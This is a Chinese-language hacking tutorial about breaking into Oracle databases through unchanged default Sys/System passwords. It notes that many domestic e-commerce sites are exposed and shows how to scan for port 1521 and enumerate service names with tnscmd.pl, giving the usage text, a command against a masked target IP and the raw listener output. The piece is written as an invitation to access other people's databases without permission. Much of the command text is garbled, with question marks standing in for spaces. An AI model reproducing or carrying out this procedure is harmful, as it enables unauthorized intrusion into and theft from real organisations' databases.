Oracle默认管理员带来的数据库安全隐患.docVIP

Oracle默认管理员密码是固定的，这是为了安装和调试的方便。Oracle数据库中的两个具有DBA权限的用户Sys和System。笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码，其中也包括很多大型的电子商务网站，我们就可以利用这个缺省密码去找我们感兴趣的东西。 进行测试前我们先来了解一些相关的知识，我们连接一个Oracle数据库的时候，需要知道它的service_name或者是Sid值，就象mssql一样，需要知道数据库名。那如何去知道呢，猜?呵呵，显然是不行的。这里我们先讲讲oracle的TNSlistener，它位于数据库Client和数据库Server之间，默认监听1521端口，这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话，oracle将不会返回它的banner，如果你输入一些东西的话，它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了，它可以查询远程 oracle数据库是否开启(也就是ping了)，查询版本，以及查询它的服务名，服务状态和数据库服务名，而且正确率很高。 理论方面的讲完了，如果还有什么不懂的可以去查找相关资料。现在开始测试吧，需要的工具有：ActivePerl，Oracle客户端，Superscan或者是其它扫描端口的软件，Tnscmd.pl.我们先用Superscan扫描开放了端口1521的主机，假设其IP是xx.xx.110.110，这样目标已经有了。然后我们要做的就是用Tnscmd.pl来查询远程数据库的服务名了，Tnscmd.pl的用法如下： C:\perl\bin@@@@dayu@@@@perl?tnscmd.pl? ? usage:?tnscmd.pl?[command]?-h?hostname? ? where?command?is?something?like?ping,?version,?status,etc.? ? (default?is?ping)? ? [-p?port]?-?alternate?TCP?port?to?use?(default?is?1521)? ? [--logfile?logfile]?-?write?raw?packets?to?specifiedlogfile? ? [--indent]?-?indent??outdent?on?parens? ? [--rawcmd?command]?-?build?your?own?CONNECT_DATA?string? ? [--cmdsize?bytes]?-?fake?TNS?command?size?(revealspacketleakage)? ? ? 我们下面用的只有简单的几个命令，其他的命令也很好用，一起去发掘吧。 然后我们就这样来： C:\perl\bin@@@@dayu@@@@perl?tnscmd.pl?services?-hxx.xx.110.110-p?1521?–indent? ? sending?(CONNECT_DATA=(COMMAND=services))toxx.xx.110.110:1521? ? writing?91?bytes? ? reading? ? ._.......6.........?.?..........? ? DETION=? ? TMP=? ? VSNNUM=135286784? ? ERR=0? ? SERVICES_EXIST=1? ? .Q........? ? SERVICE=? ? SERVICE_NAME=ORCL? ? INSTANCE=? ? INSTANCE_NAME=ORCL? ? NUM=1? ? INSTANCE_CLASS=ORACLE? ? HANDLER=? ? HANDLER_DISPLAY=DEDICATED?SERVER? ? STA=ready? ? HANDLER_INFO=LOCAL?SERVER? ? HANDLER_MAXLOAD=0? ? HANDLER_LOAD=0? ? ESTABLISHED=447278? ? REFUSED=0? ? HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227? ? HANDLER_NAME=DEDICATED? ? ADDRESS=? ? PROTOCOL=beq? ? PROGRAM=/home/oracle/bin/oracle? ? ENVS=ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL? ? ARGV0=oracleORCL? ? ARGS=? ? LOCAL=NO? ? ? ? .........@? ?